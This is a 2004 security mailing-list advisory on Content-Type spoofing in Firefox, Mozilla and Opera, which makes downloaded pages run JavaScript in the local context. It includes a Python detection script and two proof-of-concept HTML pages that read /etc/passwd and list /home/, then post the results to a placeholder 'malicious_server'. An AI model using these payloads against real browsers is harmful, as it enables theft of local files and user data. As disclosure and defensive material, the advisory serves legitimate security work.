[NEWS] Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass Security Restrictions
From: SecuriTeam (support_at_securiteam.com)
Date: 12/16/04
To: list@securiteam.com Date: 16 Dec 2004 14:50:52 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass Security Restrictions
------------------------------------------------------------------------
SUMMARY
A problem exists in some browsers where Content-Type spoofing can be used to
"force" the target user to open a page outside the remote security zone, so
that the page's JavaScript executes in the local context.
DETAILS
Browsers tested:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.54 (*)
* Konqueror version 3.3.1
* Epiphany
* Internet Explorer version 6 with SP1
* Internet Explorer version 6 with SP1 + SP2
Browsers affected:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.51 up to version 7.54 (inclusive)
When the victim visits http://malicious_server/page.html and malicious_server
responds with a page carrying an unknown Content-Type value (for example
text/html. , note the dot at the end of the type), the browser shows a dialog
window offering to open, save or cancel. If the user chooses "Open", the page
is downloaded and opened locally, and its JavaScript code is executed in the
local context. The result is the same if the user chooses to save the file and
opens it afterwards.
Giovanni tested this with several browsers, but only Mozilla Firefox and
Opera (*) were found to be exploitable in this way.
(*) For Opera, this method of exploitation requires that Opera be set as the
default application in "handler for saved files" for the case where the user
chooses "Open" in the dialog window.
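The decisive step above is that the browser treats "text/html." as an unrecognised type and falls back to the open/save dialog. The following Python check, added here as an example and not part of the advisory, models that decision over constructed proxy-log lines and flags Content-Type values that are one character away from a renderable type (the list of renderable types, the log format and the URLs are assumptions for the example):

```python
import re

# RFC 2045 "token" grammar for type/subtype: "." is a legal token character,
# so "text/html." is syntactically valid but matches no registered type.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
MEDIA_TYPE_RE = re.compile(rf"^{TOKEN}/{TOKEN}$")

# Types the browser renders inline instead of offering a dialog.
# Constructed, illustrative list for this example, not a full registry.
RENDERED_TYPES = {
    "text/html", "text/plain", "text/xml", "application/xhtml+xml",
    "image/gif", "image/jpeg", "image/png",
}


def media_type(header_value):
    """Lower-cased type/subtype of a Content-Type header, parameters dropped."""
    return header_value.split(";", 1)[0].strip().lower()


def near_miss(unknown, known):
    """True if deleting exactly one character of `unknown` yields `known`."""
    if len(unknown) != len(known) + 1:
        return False
    return any(unknown[:i] + unknown[i + 1:] == known for i in range(len(unknown)))


def classify(header_value):
    """Predict how the browser will handle the response and label the risk."""
    mt = media_type(header_value)
    if not MEDIA_TYPE_RE.match(mt):
        return "malformed"          # not a type/subtype token pair at all
    if mt in RENDERED_TYPES:
        return "rendered"           # stays inside the remote origin's zone
    if any(near_miss(mt, known) for known in RENDERED_TYPES):
        return "suspected-spoof"    # e.g. "text/html." -> dialog -> opened from disk
    return "unknown"                # ordinary download or unregistered type


def scan_log(lines):
    """Return (url, media type) for constructed 'URL<TAB>Content-Type' lines that look spoofed."""
    findings = []
    for line in lines:
        url, _, ctype = line.partition("\t")
        if classify(ctype) == "suspected-spoof":
            findings.append((url, media_type(ctype)))
    return findings


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    "http://example.test/index.html\ttext/html; charset=ISO-8859-1",
    "http://example.test/page.html\ttext/html.",
    "http://example.test/setup.exe\tapplication/octet-stream",
]

if __name__ == "__main__":
    for url, mt in scan_log(SAMPLE_LOG):
        print(f"suspected Content-Type spoof: {url} served as {mt!r}")
```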
Impact:
It could allow remote users to:
* Obtain the content of the /home/ directory (or c:\Documents and Settings\
on Windows systems) and therefore gather the set of usernames present on
the target system
* Learn whether a particular program is installed on the target system, for
use in a subsequent attack
* Read the content of confidential files
* Read the browser's cache
In Opera the cache is located in ~/.opera/cache4, while in Mozilla Firefox it
is in /.mozilla/firefox/$RANDOM-STRING.default/Cache. Since the directory
structure can be enumerated, a malicious user could easily learn the path to
Firefox's cache.
Proof of concept:
The following PoCs exploit the Linux versions of Firefox and Opera, but they
can also be applied to the Windows versions. To test Content-Type spoofing,
Giovanni modified an open source web server to make it respond with a spoofed
Content-Type.
Read a local file utilizing the innerHTML method:
<html>
<body onLoad="ReadFileContent()">
<iframe name="local_file" src="file:///etc/passwd" height=0
width=0></iframe>
<form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<script>
function ReadFileContent(){
  alert(local_file.document.all(0).innerHTML);
  document.module.content.value+=local_file.document.firstChild.innerHTML;
  //send content to malicious_server
  document.module.submit();
}
</script>
</body>
</html>
(*) This works with Firefox; with Opera it works only if the file has a .htm
or .html extension.
List the directory structure:
<html>
<body onLoad="
  for(i=0;i<local_files.document.links.length;i++)
  {document.module.content.value+=local_files.document.links.item(i);}
  alert(document.module.content.value);
  //send list_files to malicious_server
  document.module.submit();
">
<form name="module" method="post"
action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
Vendor status:
24th November 2004: Giovanni contacted Mozilla at security@mozilla.org and
Opera through its bug tracking page at https://bugs.opera.com/wizard/.
Response from Mozilla (https://bugzilla.mozilla.org/show_bug.cgi?id=273419):
"The problem is that Mozilla utilizes the mime-type for served HTTP
documents but it does use the extension for opening local files. To
workaround this, you should disable the "open with" option. This would
move the "who is to blame" around to the user because he has to go through
the OS Filemanager to open it."
ADDITIONAL INFORMATION
The information has been provided by Giovanni Delvecchio
<badpenguin@zone-h.org>.
The original article can be found at:
http://www.zone-h.org/en/advisories/read/id=6502/